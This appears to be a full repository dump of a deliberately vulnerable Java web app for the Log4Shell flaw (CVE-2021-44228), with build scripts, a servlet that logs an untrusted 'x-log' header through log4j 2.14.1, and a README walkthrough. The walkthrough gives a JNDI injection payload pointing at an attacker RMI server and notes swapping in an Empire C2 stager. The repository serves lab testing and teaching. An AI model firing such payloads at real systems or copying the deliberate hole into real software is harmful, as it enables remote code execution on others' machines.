├── README.md ├── build.gradle ├── gradle └── wrapper │ ├── gradle-wrapper.jar │ └── gradle-wrapper.properties ├── gradlew ├── gradlew.bat ├── log4shell_rce_demo.png ├── log4shell_rce_demo_empire.png └── src └── main ├── java ├── dvl4wa │ └── VulnServlet.java └── launch │ ├── DefaultServlet.java │ └── Main.java ├── resources └── log4j2.properties └── webapp ├── WEB-INF └── web.xml └── index.html /README.md: -------------------------------------------------------------------------------- 1 | # log4shell vulnerable app 2 | 3 | This is a basic, minimal, intentionally vulnerable Java web application 4 | including a version (2.14.1) of the [log4j](https://en.wikipedia.org/wiki/Log4j) 5 | library affected by the infamous 6 | [log4shell](https://en.wikipedia.org/wiki/Log4Shell) (CVE-2021-44228) 7 | vulnerability. 8 | 9 | ## build and run instructions 10 | 11 | Gradle wrapper should solve everything. Simply git clone the repo: 12 | 13 | ``` 14 | git clone https://github.com/tothi/log4shell-vulnerable-app 15 | ``` 16 | 17 | ### running with gradle wrapper 18 | 19 | And in the project dir with the file [build.gradle](./build.gradle), 20 | simply run: 21 | 22 | ``` 23 | ./gradlew appRun 24 | ``` 25 | 26 | or on Windows platform: 27 | 28 | ``` 29 | .\gradlew.bat appRun 30 | ``` 31 | 32 | JDK is needed. Versions 8 and 11 were tested and are working, 17 seems to 33 | have issues. 34 | 35 | ### building a portable fat jar 36 | 37 | This method builds a one-file portable fat JAR including an embedded 38 | Tomcat server. 39 | 40 | Simply run the gradle wrapper with the configured `shadowJar' task: 41 | 42 | ``` 43 | ./gradlew shadowJar 44 | ``` 45 | 46 | or on Windows platform: 47 | 48 | ``` 49 | .\gradlew.bat shadowJar 50 | ``` 51 | 52 | The compiled and packages JAR file will be built in the folder `./build/libs`. 53 | 54 | It is portable and can be launched using JRE: 55 | 56 | ``` 57 | java -jar ./build/libs/log4shell-vulnerable-app-all.jar 58 | ``` 59 | 60 | The all-in-one portable JAR is available on the [releases page](https://github.com/tothi/log4shell-vulnerable-app/releases) here in the repo. 61 | 62 | ### interacting with the vulnerable application 63 | 64 | The vulnerable application should listen on _all_ interfaces by 65 | default (DANGEROUS behavior if you run it on a production box). 66 | 67 | It is available on the URL: 68 | 69 | ``` 70 | http://:8888/app/ 71 | ``` 72 | 73 | Note, that the log4j vulnerability triggers only when the app performs 74 | some log4j logging activity. In this demo app, it is active when accessing 75 | the URL: 76 | 77 | ``` 78 | http://:8888/app/servlet 79 | ``` 80 | 81 | and passing a string in the Header "x-log". (This is what gets logged.) 82 | For example, using curl: 83 | 84 | ``` 85 | curl http://:8888/app/servlet -H 'x-log: ' 86 | ``` 87 | 88 | This highlights that __detecting the log4j vulnerability is not obvious at all__. 89 | 90 | ## exploiting the RCE 91 | 92 | Here are some instructions on how to exploit the RCE (even on up-to-date 93 | default Java configurations with TrustURLCodebase set to false). 94 | Tested on Linux and Windows with Java 11.0.1[23]. 95 | 96 | Simply use the [JNDI Injection Exploit Kit](https://github.com/welk1n/JNDI-Injection-Exploit) by welk1n or a more recent [fork](https://github.com/pimps/JNDI-Exploit-Kit) by pimps. 97 | 98 | Steps to perform (in this example, target host is 192.168.56.101 and attacker gost is 192.168.56.1): 99 | 100 | 1. Launch the vulnerable web app with `.\gradlew.bat appRun`. It listens 101 | on 192.168.56.101:8888 and uses Tomcat 8.5 as a backend. Tomcat 8 (in the classpath) is mandatory for the javax.el.ELProcessor RMI exploit path (supported by the current version of the JNDI Injection Exploit Kit). 102 | 103 | 2. Launch the JNDI Injection Exploit Kit on the attacker host after building with `mvn package` with `java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'calc.exe'` (the payload will execute calc.exe on the target). Helper servers are started now on 192.168.56.1. Assuming the RMI url for trustURLCodeBase false config is `rmi://192.168.56.1:1099/xzmtee`. 104 | 105 | 3. Trigger the exploit by sending the malicious payload through the "x-log" header: `curl http://192.168.56.101:8888/app/servlet -H 'x-log: ${jndi:rmi://192.168.56.1:1099/xzmtee}` 106 | 107 | 4. The app should use the vulnerable log4j for logging the contents of the "x-log" header. While logging, it looks up the referenced RMI URL, and the JNDI Kit sends the RCE payload classloading reference. 108 | 109 | 5. Note, that instead of logging the actual content of the "x-log" header, the referenced class name ("javax.el.ELProcessor") gets logged. 110 | 111 | 6. On the target host, calc.exe should be spawned, reaching RCE. 112 | 113 | ![](./log4shell_rce_demo.png) 114 | 115 | UPDATE: here is an extra PoC screenshot for those who are curious and doubt whether launching a calc.exe is useful for anything at all. In this screenshot, replaced the calc.exe payload with an Empire stager giving a full featured C2 Empire Agent (also bypassing up-to-date Windows Defender). 116 | 117 | ![](./log4shell_rce_demo_empire.png) 118 | -------------------------------------------------------------------------------- /build.gradle: -------------------------------------------------------------------------------- 1 | plugins { 2 | id "war" 3 | id "org.gretty" version "3.0.5" 4 | id "com.github.johnrengelman.shadow" version "7.1.2" 5 | id "java" 6 | } 7 | 8 | sourceCompatibility = "1.8" 9 | targetCompatibility = "1.8" 10 | 11 | repositories { 12 | mavenCentral() 13 | } 14 | 15 | dependencies { 16 | implementation 'org.apache.logging.log4j:log4j-core:2.14.1' 17 | if (project.gradle.startParameter.taskNames.first().contains("shadow")) { 18 | implementation 'org.apache.tomcat.embed:tomcat-embed-jasper:8.5.75' 19 | } 20 | } 21 | 22 | gretty { 23 | contextPath = 'app' 24 | servletContainer = 'tomcat85' 25 | } 26 | 27 | sourceSets { 28 | main { 29 | java { 30 | srcDir 'src' 31 | if (!project.gradle.startParameter.taskNames.first().contains("shadow")) { 32 | exclude '**/launch/**' 33 | } 34 | } 35 | } 36 | } 37 | 38 | jar { 39 | manifest { 40 | attributes('Main-Class': 'launch.Main') 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /gradle/wrapper/gradle-wrapper.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tothi/log4shell-vulnerable-app/4a230a9a614595440f88968301c645f3e2a3ceca/gradle/wrapper/gradle-wrapper.jar -------------------------------------------------------------------------------- /gradle/wrapper/gradle-wrapper.properties: -------------------------------------------------------------------------------- 1 | distributionBase=GRADLE_USER_HOME 2 | distributionPath=wrapper/dists 3 | distributionUrl=https\://services.gradle.org/distributions/gradle-7.3.1-bin.zip 4 | zipStoreBase=GRADLE_USER_HOME 5 | zipStorePath=wrapper/dists 6 | -------------------------------------------------------------------------------- /gradlew: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 4 | # Copyright © 2015-2021 the original authors. 5 | # 6 | # Licensed under the Apache License, Version 2.0 (the "License"); 7 | # you may not use this file except in compliance with the License. 8 | # You may obtain a copy of the License at 9 | # 10 | # https://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, software 13 | # distributed under the License is distributed on an "AS IS" BASIS, 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 15 | # See the License for the specific language governing permissions and 16 | # limitations under the License. 17 | # 18 | 19 | ############################################################################## 20 | # 21 | # Gradle start up script for POSIX generated by Gradle. 22 | # 23 | # Important for running: 24 | # 25 | # (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is 26 | # noncompliant, but you have some other compliant shell such as ksh or 27 | # bash, then to run this script, type that shell name before the whole 28 | # command line, like: 29 | # 30 | # ksh Gradle 31 | # 32 | # Busybox and similar reduced shells will NOT work, because this script 33 | # requires all of these POSIX shell features: 34 | # * functions; 35 | # * expansions «$var», «${var}», «${var:-default}», «${var+SET}», 36 | # «${var#prefix}», «${var%suffix}», and «$( cmd )»; 37 | # * compound commands having a testable exit status, especially «case»; 38 | # * various built-in commands including «command», «set», and «ulimit». 39 | # 40 | # Important for patching: 41 | # 42 | # (2) This script targets any POSIX shell, so it avoids extensions provided 43 | # by Bash, Ksh, etc; in particular arrays are avoided. 44 | # 45 | # The "traditional" practice of packing multiple parameters into a 46 | # space-separated string is a well documented source of bugs and security 47 | # problems, so this is (mostly) avoided, by progressively accumulating 48 | # options in "$@", and eventually passing that to Java. 49 | # 50 | # Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, 51 | # and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; 52 | # see the in-line comments for details. 53 | # 54 | # There are tweaks for specific operating systems such as AIX, CygWin, 55 | # Darwin, MinGW, and NonStop. 56 | # 57 | # (3) This script is generated from the Groovy template 58 | # https://github.com/gradle/gradle/blob/master/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt 59 | # within the Gradle project. 60 | # 61 | # You can find Gradle at https://github.com/gradle/gradle/. 62 | # 63 | ############################################################################## 64 | 65 | # Attempt to set APP_HOME 66 | 67 | # Resolve links: $0 may be a link 68 | app_path=$0 69 | 70 | # Need this for daisy-chained symlinks. 71 | while 72 | APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path 73 | [ -h "$app_path" ] 74 | do 75 | ls=$( ls -ld "$app_path" ) 76 | link=${ls#*' -> '} 77 | case $link in #( 78 | /*) app_path=$link ;; #( 79 | *) app_path=$APP_HOME$link ;; 80 | esac 81 | done 82 | 83 | APP_HOME=$( cd "${APP_HOME:-./}" && pwd -P ) || exit 84 | 85 | APP_NAME="Gradle" 86 | APP_BASE_NAME=${0##*/} 87 | 88 | # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 89 | DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' 90 | 91 | # Use the maximum available, or set MAX_FD != -1 to use that value. 92 | MAX_FD=maximum 93 | 94 | warn () { 95 | echo "$*" 96 | } >&2 97 | 98 | die () { 99 | echo 100 | echo "$*" 101 | echo 102 | exit 1 103 | } >&2 104 | 105 | # OS specific support (must be 'true' or 'false'). 106 | cygwin=false 107 | msys=false 108 | darwin=false 109 | nonstop=false 110 | case "$( uname )" in #( 111 | CYGWIN* ) cygwin=true ;; #( 112 | Darwin* ) darwin=true ;; #( 113 | MSYS* | MINGW* ) msys=true ;; #( 114 | NONSTOP* ) nonstop=true ;; 115 | esac 116 | 117 | CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 118 | 119 | 120 | # Determine the Java command to use to start the JVM. 121 | if [ -n "$JAVA_HOME" ] ; then 122 | if [ -x "$JAVA_HOME/jre/sh/java" ] ; then 123 | # IBM's JDK on AIX uses strange locations for the executables 124 | JAVACMD=$JAVA_HOME/jre/sh/java 125 | else 126 | JAVACMD=$JAVA_HOME/bin/java 127 | fi 128 | if [ ! -x "$JAVACMD" ] ; then 129 | die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 130 | 131 | Please set the JAVA_HOME variable in your environment to match the 132 | location of your Java installation." 133 | fi 134 | else 135 | JAVACMD=java 136 | which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 137 | 138 | Please set the JAVA_HOME variable in your environment to match the 139 | location of your Java installation." 140 | fi 141 | 142 | # Increase the maximum file descriptors if we can. 143 | if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then 144 | case $MAX_FD in #( 145 | max*) 146 | MAX_FD=$( ulimit -H -n ) || 147 | warn "Could not query maximum file descriptor limit" 148 | esac 149 | case $MAX_FD in #( 150 | '' | soft) :;; #( 151 | *) 152 | ulimit -n "$MAX_FD" || 153 | warn "Could not set maximum file descriptor limit to $MAX_FD" 154 | esac 155 | fi 156 | 157 | # Collect all arguments for the java command, stacking in reverse order: 158 | # * args from the command line 159 | # * the main class name 160 | # * -classpath 161 | # * -D...appname settings 162 | # * --module-path (only if needed) 163 | # * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 164 | 165 | # For Cygwin or MSYS, switch paths to Windows format before running java 166 | if "$cygwin" || "$msys" ; then 167 | APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) 168 | CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) 169 | 170 | JAVACMD=$( cygpath --unix "$JAVACMD" ) 171 | 172 | # Now convert the arguments - kludge to limit ourselves to /bin/sh 173 | for arg do 174 | if 175 | case $arg in #( 176 | -*) false ;; # don't mess with options #( 177 | /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath 178 | [ -e "$t" ] ;; #( 179 | *) false ;; 180 | esac 181 | then 182 | arg=$( cygpath --path --ignore --mixed "$arg" ) 183 | fi 184 | # Roll the args list around exactly as many times as the number of 185 | # args, so each arg winds up back in the position where it started, but 186 | # possibly modified. 187 | # 188 | # NB: a `for` loop captures its iteration list before it begins, so 189 | # changing the positional parameters here affects neither the number of 190 | # iterations, nor the values presented in `arg`. 191 | shift # remove old arg 192 | set -- "$@" "$arg" # push replacement arg 193 | done 194 | fi 195 | 196 | # Collect all arguments for the java command; 197 | # * $DEFAULT_JVM_OPTS, $JAVA_OPTS, and $GRADLE_OPTS can contain fragments of 198 | # shell script including quotes and variable substitutions, so put them in 199 | # double quotes to make sure that they get re-expanded; and 200 | # * put everything else in single quotes, so that it's not re-expanded. 201 | 202 | set -- \ 203 | "-Dorg.gradle.appname=$APP_BASE_NAME" \ 204 | -classpath "$CLASSPATH" \ 205 | org.gradle.wrapper.GradleWrapperMain \ 206 | "$@" 207 | 208 | # Use "xargs" to parse quoted args. 209 | # 210 | # With -n1 it outputs one arg per line, with the quotes and backslashes removed. 211 | # 212 | # In Bash we could simply go: 213 | # 214 | # readarray ARGS < <( xargs -n1 <<<"$var" ) && 215 | # set -- "${ARGS[@]}" "$@" 216 | # 217 | # but POSIX shell has neither arrays nor command substitution, so instead we 218 | # post-process each arg (as a line of input to sed) to backslash-escape any 219 | # character that might be a shell metacharacter, then use eval to reverse 220 | # that process (while maintaining the separation between arguments), and wrap 221 | # the whole thing up as a single "set" statement. 222 | # 223 | # This will of course break if any of these variables contains a newline or 224 | # an unmatched quote. 225 | # 226 | 227 | eval "set -- $( 228 | printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | 229 | xargs -n1 | 230 | sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | 231 | tr '\n' ' ' 232 | )" '"$@"' 233 | 234 | exec "$JAVACMD" "$@" 235 | -------------------------------------------------------------------------------- /gradlew.bat: -------------------------------------------------------------------------------- 1 | @rem 2 | @rem Copyright 2015 the original author or authors. 3 | @rem 4 | @rem Licensed under the Apache License, Version 2.0 (the "License"); 5 | @rem you may not use this file except in compliance with the License. 6 | @rem You may obtain a copy of the License at 7 | @rem 8 | @rem https://www.apache.org/licenses/LICENSE-2.0 9 | @rem 10 | @rem Unless required by applicable law or agreed to in writing, software 11 | @rem distributed under the License is distributed on an "AS IS" BASIS, 12 | @rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | @rem See the License for the specific language governing permissions and 14 | @rem limitations under the License. 15 | @rem 16 | 17 | @if "%DEBUG%" == "" @echo off 18 | @rem ########################################################################## 19 | @rem 20 | @rem Gradle startup script for Windows 21 | @rem 22 | @rem ########################################################################## 23 | 24 | @rem Set local scope for the variables with windows NT shell 25 | if "%OS%"=="Windows_NT" setlocal 26 | 27 | set DIRNAME=%~dp0 28 | if "%DIRNAME%" == "" set DIRNAME=. 29 | set APP_BASE_NAME=%~n0 30 | set APP_HOME=%DIRNAME% 31 | 32 | @rem Resolve any "." and ".." in APP_HOME to make it shorter. 33 | for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi 34 | 35 | @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 36 | set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" 37 | 38 | @rem Find java.exe 39 | if defined JAVA_HOME goto findJavaFromJavaHome 40 | 41 | set JAVA_EXE=java.exe 42 | %JAVA_EXE% -version >NUL 2>&1 43 | if "%ERRORLEVEL%" == "0" goto execute 44 | 45 | echo. 46 | echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 47 | echo. 48 | echo Please set the JAVA_HOME variable in your environment to match the 49 | echo location of your Java installation. 50 | 51 | goto fail 52 | 53 | :findJavaFromJavaHome 54 | set JAVA_HOME=%JAVA_HOME:"=% 55 | set JAVA_EXE=%JAVA_HOME%/bin/java.exe 56 | 57 | if exist "%JAVA_EXE%" goto execute 58 | 59 | echo. 60 | echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 61 | echo. 62 | echo Please set the JAVA_HOME variable in your environment to match the 63 | echo location of your Java installation. 64 | 65 | goto fail 66 | 67 | :execute 68 | @rem Setup the command line 69 | 70 | set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar 71 | 72 | 73 | @rem Execute Gradle 74 | "%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* 75 | 76 | :end 77 | @rem End local scope for the variables with windows NT shell 78 | if "%ERRORLEVEL%"=="0" goto mainEnd 79 | 80 | :fail 81 | rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of 82 | rem the _cmd.exe /c_ return code! 83 | if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 84 | exit /b 1 85 | 86 | :mainEnd 87 | if "%OS%"=="Windows_NT" endlocal 88 | 89 | :omega 90 | -------------------------------------------------------------------------------- /log4shell_rce_demo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tothi/log4shell-vulnerable-app/4a230a9a614595440f88968301c645f3e2a3ceca/log4shell_rce_demo.png -------------------------------------------------------------------------------- /log4shell_rce_demo_empire.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tothi/log4shell-vulnerable-app/4a230a9a614595440f88968301c645f3e2a3ceca/log4shell_rce_demo_empire.png -------------------------------------------------------------------------------- /src/main/java/dvl4wa/VulnServlet.java: -------------------------------------------------------------------------------- 1 | package dvl4wa; 2 | 3 | import javax.servlet.*; 4 | import javax.servlet.http.*; 5 | import java.io.*; 6 | import java.io.Writer; 7 | import java.util.Map; 8 | import java.util.Collections; 9 | import java.util.stream.Collectors; 10 | import org.apache.logging.log4j.Logger; 11 | import org.apache.logging.log4j.LogManager; 12 | 13 | public class VulnServlet extends HttpServlet { 14 | protected void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException { 15 | Logger logger = LogManager.getLogger(VulnServlet.class); 16 | try { 17 | Map headers = Collections.list(req.getHeaderNames()).stream().collect(Collectors.toMap(h -> h, req::getHeader)); 18 | res.setContentType("text/plain; charset=utf-8"); 19 | Writer writer = res.getWriter(); 20 | if(headers.containsKey("x-log")) { 21 | writer.write("Logging to console using vulnerable log4j2!\n"); 22 | logger.info(headers.get("x-log")); 23 | } else { 24 | writer.write("Hello world\n"); 25 | } 26 | writer.close(); 27 | } catch(Exception e) { 28 | throw new ServletException(e.getMessage(), e); 29 | } 30 | } 31 | } 32 | 33 | -------------------------------------------------------------------------------- /src/main/java/launch/DefaultServlet.java: -------------------------------------------------------------------------------- 1 | package launch; 2 | 3 | import javax.servlet.*; 4 | import javax.servlet.http.*; 5 | import java.io.*; 6 | import java.io.Writer; 7 | import java.util.Map; 8 | import java.util.Collections; 9 | import java.util.stream.Collectors; 10 | 11 | public class DefaultServlet extends HttpServlet { 12 | protected void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException { 13 | try { 14 | res.setContentType("text/html; charset=utf-8"); 15 | Writer writer = res.getWriter(); 16 | writer.write("\n\n

Damn Vulnerable log4j Web Application

\n"); 17 | writer.write("

Click here to reach the vulnerable endpoint.

\n"); 18 | writer.write("

Use the HTTP Header 'x-log' for triggering the vulnerability.

\n"); 19 | writer.write("

\n\n\n"); 20 | writer.close(); 21 | } catch(Exception e) { 22 | throw new ServletException(e.getMessage(), e); 23 | } 24 | } 25 | } 26 | 27 | -------------------------------------------------------------------------------- /src/main/java/launch/Main.java: -------------------------------------------------------------------------------- 1 | package launch; 2 | 3 | import org.apache.catalina.startup.Tomcat; 4 | import org.apache.catalina.Context; 5 | 6 | import java.io.File; 7 | import java.io.IOException; 8 | 9 | import dvl4wa.VulnServlet; 10 | import launch.DefaultServlet; 11 | 12 | public class Main { 13 | private static final int PORT = 8888; 14 | 15 | public static void main(String[] args) throws Exception { 16 | String contextPath = "/app"; 17 | String appBase = "."; 18 | Tomcat tomcat = new Tomcat(); 19 | tomcat.setPort(PORT); 20 | tomcat.getHost().setAppBase(appBase); 21 | File docBase = new File(System.getProperty("java.io.tmpdir")); 22 | Context ctx = tomcat.addContext(contextPath, docBase.getAbsolutePath()); 23 | 24 | Class servletClass = VulnServlet.class; 25 | Class servletClassDefault = DefaultServlet.class; 26 | tomcat.addServlet(ctx, servletClass.getSimpleName(), servletClass.getName()); 27 | tomcat.addServlet(ctx, servletClassDefault.getSimpleName(), servletClassDefault.getName()); 28 | ctx.addServletMappingDecoded("/servlet/*", servletClass.getSimpleName()); 29 | ctx.addServletMappingDecoded("/", servletClassDefault.getSimpleName()); 30 | 31 | tomcat.start(); 32 | tomcat.getServer().await(); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /src/main/resources/log4j2.properties: -------------------------------------------------------------------------------- 1 | status = warn 2 | name = ConsoleLogConfigDemo 3 | 4 | # Console appender configuration 5 | appender.console.type = Console 6 | appender.console.name = consoleLogger 7 | appender.console.layout.type = PatternLayout 8 | appender.console.layout.pattern = %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n 9 | 10 | # Root logger level 11 | rootLogger.level = debug 12 | # Root logger referring to console appender 13 | rootLogger.appenderRef.stdout.ref = consoleLogger 14 | -------------------------------------------------------------------------------- /src/main/webapp/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | Damn Vulnerable Log4j Web Application 4 | 5 | 6 | index.html 7 | 8 | 9 | 10 | log4j 11 | dvl4wa.VulnServlet 12 | 13 | 14 | 15 | log4j 16 | /servlet 17 | 18 | 19 | -------------------------------------------------------------------------------- /src/main/webapp/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Damn Vulnerable log4j Web Application

4 |

5 | Click here to reach the vulnerable endpoint. 6 |

7 |

8 | Use the HTTP Header "x-log" for triggering the vulnerability. 9 |

10 | 11 | 12 | --------------------------------------------------------------------------------